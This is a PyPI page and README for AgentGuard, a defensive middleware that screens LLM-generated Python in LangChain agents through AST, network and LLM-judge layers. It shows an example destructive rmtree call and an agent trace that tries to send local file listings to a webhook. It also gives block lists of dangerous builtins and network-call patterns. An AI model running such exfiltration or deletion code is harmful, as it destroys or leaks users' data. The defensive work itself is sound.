๐ก๏ธ AgentGuard
A security middleware for LangChain agents โ intercept, validate and safely execute LLM-generated code.
๐ค The Problem
Modern LangChain agents are powerful because they can generate and execute Python code autonomously. But this power is a double-edged sword.
A single malicious prompt or a hallucination can lead an agent to generate code like this:
# An agent asked to "clean up temp files" might generate:
import os
import shutil
shutil.rmtree("/var/data/users") # ๐ Oops.
There is no native guardrail in LangChain to prevent this.
AgentGuard is that guardrail.
โ The Solution
AgentGuard wraps your agent's code execution tool in a 3-layer security pipeline. Before any LLM-generated code runs, it must pass through all three layers:
flowchart TD
A["๐ค LLM Agent generates code"] --> B{"๐ Layer 1: AST Validator"}
B -->|"โ
Pass"| C{"๐ Layer 2: Network Filter"}
B -->|"โ Blocked"| E["๐ก๏ธ SecurityBlockedError\nโ Agent self-corrects"]
C -->|"โ
Pass"| D{"๐ง Layer 3: Semantic Judge"}
C -->|"โ Blocked"| E
D -->|"โ
SAFE"| F["โก Sandboxed exec()\nโ Result back to Agent"]
D -->|"โ UNSAFE"| E
style A fill:#4a9eff,color:#fff
style B fill:#ff9f43,color:#fff
style C fill:#ff9f43,color:#fff
style D fill:#ff9f43,color:#fff
style E fill:#ee5a24,color:#fff
style F fill:#2ed573,color:#fff
If any layer blocks the code, the agent receives a descriptive error and self-corrects โ no crash, no data loss.
๐ก๏ธ How it works in Action
When an agent attempts to execute unauthorized system operations, AgentGuard intercepts the execution and provides a self-healing feedback loop back to the LLM:
> Entering new AgentExecutor chain...
Thought: I need to read the local files and send them to a webhook.
Action: safe_python_repl
Action Input:
import os
import requests
files = os.listdir('.')
requests.post('https://webhook.site/test', json={"files": files})
Observation: [AgentGuard | AST Validator] ๐ด BLOCKED โ Forbidden import detected: 'os'. Rewrite the code without the forbidden operation.
Thought: I am not allowed to use the 'os' module to read files. I cannot fulfill this request as it requires system access.
Final Answer: ๐ I am sorry, but I am restricted from accessing the local file system or sending data to external webhooks due to security policies.
๐ Quick Start
pip install securellm-agentguard
import os
from agentguard import SafePythonREPLTool, SecurityPolicy
from langchain_google_genai import ChatGoogleGenerativeAI
os.environ["GEMINI_API_KEY"] = "your-api-key"
# Define your security rules
policy = SecurityPolicy(
allowed_modules=["pandas", "json", "math"],
allowed_domains=["api.github.com"],
use_semantic_judge=True,
)
# Layer 3 requires a Gemini LLM (optional โ Layers 1 & 2 work without it)
judge_llm = ChatGoogleGenerativeAI(model="gemini-2.0-flash")
safe_repl = SafePythonREPLTool(policy=policy, judge_llm=judge_llm)
# Use it in your LangChain agent instead of PythonREPLTool
# agent = create_react_agent(llm=your_llm, tools=[safe_repl])
โ๏ธ SecurityPolicy Options
| Parameter | Type | Default | Description |
|---|---|---|---|
allowed_modules |
list[str] |
["math", "json", ...] |
Whitelisted Python modules |
allowed_domains |
list[str] |
[] (block all) |
Whitelisted network domains |
use_semantic_judge |
bool |
True |
Enable Gemini LLM analysis |
execution_timeout |
int |
10 |
Max execution seconds |
๐ Security Layers in Detail
Layer 1 โ AST Static Validator
Uses Python's native ast module to parse the code without executing it.
Blocks:
- Any
importnot explicitly whitelisted inallowed_modules from X import Ystyle imports of non-whitelisted modules- Dangerous built-in calls:
exec,eval,compile,open,__import__ - Sandbox escape vectors:
getattr,setattr,delattr,globals,locals
Speed: ~0.1ms โ no I/O, no network, pure AST traversal.
Layer 2 โ Network Filter
Uses regex patterns to detect outbound network calls and validates target domains against the whitelist.
Detects:
requests.get/post/put/delete/patch/headhttpxandaiohttpcallsurllib.request.urlopenandurlretrieve- Raw
socket.connect()calls - Bare URL literals (
https://...)
An empty allowed_domains list blocks all network access.
Layer 3 โ Semantic Judge (Gemini)
For subtle attacks that evade static analysis (e.g. a loop that deletes files one-by-one), the code is sent to gemini-1.5-flash with a strict binary prompt.
Verdict: Only code classified as SAFE passes. Anything else (including ambiguous responses) is blocked โ fail-closed by design.
Catches: Data exfiltration, privilege escalation, destructive file operations, obfuscated malicious intent.
Sandboxed Execution
Code that passes all 3 layers runs in a restricted environment:
- Safe builtins only โ
print,len,range, etc. (noexec,eval,open) - stdout capture โ
print()output is returned to the agent - Timeout enforcement โ configurable via
execution_timeout - Thread isolation โ execution runs in a daemon thread
๐ Project Structure
agentguard/
โโโ agentguard/
โ โโโ __init__.py # Public API exports
โ โโโ policy.py # SecurityPolicy (Pydantic model)
โ โโโ exceptions.py # SecurityBlockedError
โ โโโ validators/
โ โ โโโ ast_validator.py # Layer 1: Static AST analysis
โ โ โโโ network_filter.py # Layer 2: Network domain filter
โ โโโ judges/
โ โ โโโ gemini_judge.py # Layer 3: Gemini semantic judge
โ โโโ tools/
โ โโโ langchain_tool.py # SafePythonREPLTool (LangChain BaseTool)
โโโ tests/ # Pytest suite (mocked LLM for Layer 3)
โโโ examples/
โ โโโ basic_agent.py # Simple agent + AgentGuard demo
โ โโโ threat_intel_demo.py # Threat analysis agent demo
โโโ pyproject.toml # Poetry config + metadata
โโโ .github/workflows/ci.yml # GitHub Actions CI
โโโ README.md
๐บ๏ธ Roadmap
- 3-layer security pipeline (AST + Network + Semantic Judge)
- LangChain
BaseToolintegration - Sandboxed execution with safe builtins
- Timeout enforcement
- GitHub Actions CI
- Logging & Audit Trail โ structured logs of every blocked/allowed execution
- Dashboard UI โ web dashboard to visualize security events in real-time
- Rate Limiting โ limit the number of code executions per minute
- Plugin System โ custom validator layers via a simple interface
- PyPI Publication โ
pip install securellm-agentguardfrom the public index - LangSmith Integration โ trace security events in LangSmith
๐ค Contributing
Contributions are welcome! Please read CONTRIBUTING.md first.
๐ Security
Found a vulnerability? Please read SECURITY.md for responsible disclosure instructions.
๐ License
MIT โ see LICENSE.
Built by Thomas LEON ยท Emerging Technologies & AI Security
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file securellm_agentguard-0.1.0.tar.gz.
File metadata
- Download URL: securellm_agentguard-0.1.0.tar.gz
- Upload date:
- Size: 12.0 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.12.2
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
892d6d76ed1ea8877eeef9c06341744bcf354c8a4433f38f43858b44114a0920
|
|
| MD5 |
a4ccdba68f50217ec1c0573bb02e384f
|
|
| BLAKE2b-256 |
fbdd68014c8cc24d612eefc69bd0bacfbb39037f4b77bd26eea75021f62ba03f
|
File details
Details for the file securellm_agentguard-0.1.0-py3-none-any.whl.
File metadata
- Download URL: securellm_agentguard-0.1.0-py3-none-any.whl
- Upload date:
- Size: 15.4 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.12.2
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
3e6ddf0917eb004eb6890551d9765553c46b5b59a65fd6ab0886e62cca59e45f
|
|
| MD5 |
cbe66a591b3b82ae850ecb609e6b47c8
|
|
| BLAKE2b-256 |
2df718b490378a18fbbfd0d7dafaf9368691b93f0682a18663e5f29c9b74e1b1
|